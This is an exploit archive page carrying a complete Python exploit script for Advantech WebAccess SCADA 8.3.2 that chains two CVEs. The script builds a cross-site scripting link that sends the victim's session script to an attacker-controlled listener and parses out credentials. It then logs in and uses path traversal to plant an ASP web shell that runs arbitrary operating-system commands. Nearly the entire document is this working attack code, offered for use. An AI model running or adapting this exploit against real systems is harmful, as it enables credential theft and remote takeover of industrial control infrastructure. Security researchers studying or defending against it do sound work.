exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Advantech WebAccess SCADA 8.3.2 Remote Code Execution

Advantech WebAccess SCADA 8.3.2 Remote Code Execution
Posted Nov 5, 2018
Authored by Chris Lyne

Advantech WebAccess SCADA version 8.3.2 suffers from a code execution vulnerability.

tags | exploit, code execution
advisories | CVE-2018-15705, CVE-2018-15707
SHA-256 | 54655f065e3a495129a4eb8059227b2933475527411c65bf1abae23771430c88

Advantech WebAccess SCADA 8.3.2 Remote Code Execution

Change Mirror Download
# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
# Date: 2018-11-02
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: http://www.advantech.com
# Device: NRVMini2
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH
# Version: 8.3.2
# Tested on: Windows Server 2008 R2
# CVE: CVE-2018-15705, CVE-2018-15707
# TRA: https://www.tenable.com/security/research/tra-2018-35
# Description:
#
# This code exploits two vulnerabilities to gain remote code execution
# with Administrator privileges:
#
# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required.
# 2) CVE-2018-15705 to write an ASP file to the server.

from http.server import HTTPServer, BaseHTTPRequestHandler
from base64 import decodestring
import re
import requests, urllib, json
import sys
import argparse

TIMEOUT = 5 # sec

def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)

# WADashboard client
class WsClient:
def __init__(self, ip, port, https=False):
self.ip = ip
self.port = port
self.https = https

self.endpoint = 'https' if https else 'http'
self.endpoint += '://' + ip + ':' + str(port)
self.endpoint += '/WADashboard'

# see if service is up
def grab_projects(self):
url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList'
r = requests.get(url, timeout=TIMEOUT)
if "resString" in r.text:
json_decoded = json.loads(r.text)
if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0:
return json_decoded['resString']
return None

# success if we get cookies
def login(self, projectName, user, pw):
# issue a login request and set the cookies
# POST /WADashboard/login?cont=dashboardViewer
# projectName1=myproject&username=admin&password=hello&recId=
url = self.endpoint + '/login?cont=dashboardViewer'
data = {
'projectName1' : projectName,
'username' : user,
'password' : pw,
'recId' : ''
}
r = requests.post(url, data, timeout=TIMEOUT)
if len(r.cookies) > 0:
self.cookies = r.cookies
return True # success
else:
return False # fail

def write_file(self, filename, contents):
# /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true

# post the writeFile request
# for some reason, the data is required in the query string instead of POST data
url = self.endpoint + '/api/dashboard/v1/files/writeFile'
data = {
'projectSpecies' : victim['project'] + '!savedConfiguration',
'folderpath' : '../../../../' + filename, # uploads to /Broadweb/ folder
'msg' : contents,
'overwrite' : 'true'
}

url += '?' + urllib.urlencode(data)
r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT)
return (r.status_code == 200)

# This class will serve as an HTTP listener
class MyWebHandler(BaseHTTPRequestHandler):
def do_GET(self):

data = self.path.replace('/', '') # remove leading slash
decoded = decodestring(data)

print "\n***LINK CLICKED!***"

try:
# carve out the piece we want to match
i = decoded.index('logOnWebService')
k = decoded.index('readNodeStatus')
chunk = decoded[i:k]

# find our match
regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*'
m = re.match(regex, chunk)

if not m:
err_and_exit("Couldn't extract credentials...")

print "\nCredentials stolen..."
user = m.group(1)
pw = m.group(2)
print "- User: " + user
print "- Pass: " + pw

# login to WADashboard
if not client.login(victim['project'], user, pw):
err_and_exit("Credentials didn't work...")

print '\nLogged into WADashboard with credentials.'

# write malicious ASP file
asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>'
filename = 'exec.asp'
if not client.write_file(filename, asp_payload):
err_and_exit("Write file failed...")

print "\n'" + filename + "' written to disk."

# execute OS command
url = broadweb_root + '/' + filename
data = {
'p' : victim['project'],
'n' : victim['node'],
'c' : victim['cmd']
}

url += '?' + urllib.urlencode(data)
r = requests.get(url, timeout=TIMEOUT) # no cookie needed
if r.status_code == 200:
print "\nSuccessful request to '" + url + "'\n"
else:
print "\nThere may be something wrong with the ASP payload.\n"

print "\nDone!"
except Exception as e:
print "Exception encountered: " + str(e)

msg = 'hello poppet'

self.send_response(200)
self.end_headers()
self.wfile.write(str.encode(msg))

# MAIN

# deal with command line flags
desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64.

The goal of the script is to execute code remotely. User interaction is required.

The following operations will be conducted:
1) Ensure WebAccess application is running. (TCP port 80 by default)
2) Ensure WADashboard is running. (TCP port 8081 by default)
3) Ensure user-specified project exists.
4) Ensure user-specified node exists.
5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS)
6) Start HTTP listener to receive credentials when victim clicks the link.
7) Login to WADashboard.
8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705)
Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function.
9) Execute user-specified command.

Example (equivalent) commands:
python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe
python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe
'''

arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)')
arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)')
arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)')
arg_parser.add_argument('-proj', required=True, help='Project name')
arg_parser.add_argument('-node', required=True, help='Node name')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-cmd', required=True, help='OS command to be executed')

args = arg_parser.parse_args()

# victim settings
victim = dict()
victim['ip'] = args.t
victim['web_port'] = args.p1 # Broadweb web app port
victim['ws_port'] = args.p2 # WADashboard Node.js service port
victim['https'] = args.https
victim['project'] = args.proj
victim['node'] = args.node
victim['cmd'] = args.cmd

# listener settings
listener = dict()
listener['ip'] = args.ip
listener['port'] = args.port

# validate IP addresses
ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
for ip in [victim['ip'], listener['ip']]:
match = re.match(ip_pattern, ip)
if match is None:
print "\nError: IP Address is invalid: '" + ip + "'.\n"
arg_parser.print_help()
sys.exit(1)

# start the real work
# ensure WebAccess ASP application is running
print "\nPerforming some banner checks to ensure services are running...\n"
proto = 'https' if victim['https'] else 'http'
broadweb_root = proto + '://' + victim['ip']
# no need to add port if it's 80 or 443
https = victim['https']
if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https):
broadweb_root += ':' + str(victim['web_port'])
broadweb_root += '/broadWeb'
url = broadweb_root + '/bwRoot.asp'

try:
r = requests.get(url, timeout=TIMEOUT)
except requests.exceptions.ConnectionError as e:
err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port']))

if 'Welcome to Advantech WebAccess' not in r.text:
err_and_exit('WebAccess not found.')

print 'WebAccess is up.'

# ensure WADashboard Node.js service is running
# and projects are defined
client = WsClient(victim['ip'], victim['ws_port'], https=https)

try:
projects = client.grab_projects()
except requests.exceptions.ConnectionError as e:
err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port']))

if not projects:
err_and_exit('Dashboard Viewer not found.')

print "Dashboard Viewer is up."

if len(projects) == 0:
err_and_exit("No projects found...")

print "\nFound projects: "
for project in projects:
print " - " + project

# ensure specified project exists
if victim['project'] not in projects:
err_and_exit("Specified project, " + victim['project'] + " was not found...")

print "Specified project '" + victim['project'] + "' exists."

# ensure nodes are defined for project
# we have to specify a node name to run the custom RemoteWinExec() function
url = broadweb_root + '/' + victim['project'] +'.dpj'
r = requests.get(url, timeout=TIMEOUT)
node_list = list()
if "[nodelist]" in r.text:
for line in r.text.split('\n'):
regex = "^node[0-9]=(.*)$"
m = re.match(regex, line, flags=re.MULTILINE)
if m:
node_list.append(m.group(1).strip())

if len(node_list) == 0:
err_and_exit("No nodes found...")

print "\nFound nodes: "
for node in node_list:
print ' - ' + node

if victim['node'] not in node_list:
err_and_exit("Node, " + victim['node'] + " not in node list...")

print "Specified node '" + victim['node'] + "' exists."

# generate link to send to victim
print "\nSend this link to the victim:"
print "Keep in mind, they could be logged in via localhost."
link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');'
link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/'
link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//'

print link

# start listener
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
print "Waiting for victim to click link..."
httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler)
httpd.handle_request()



Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close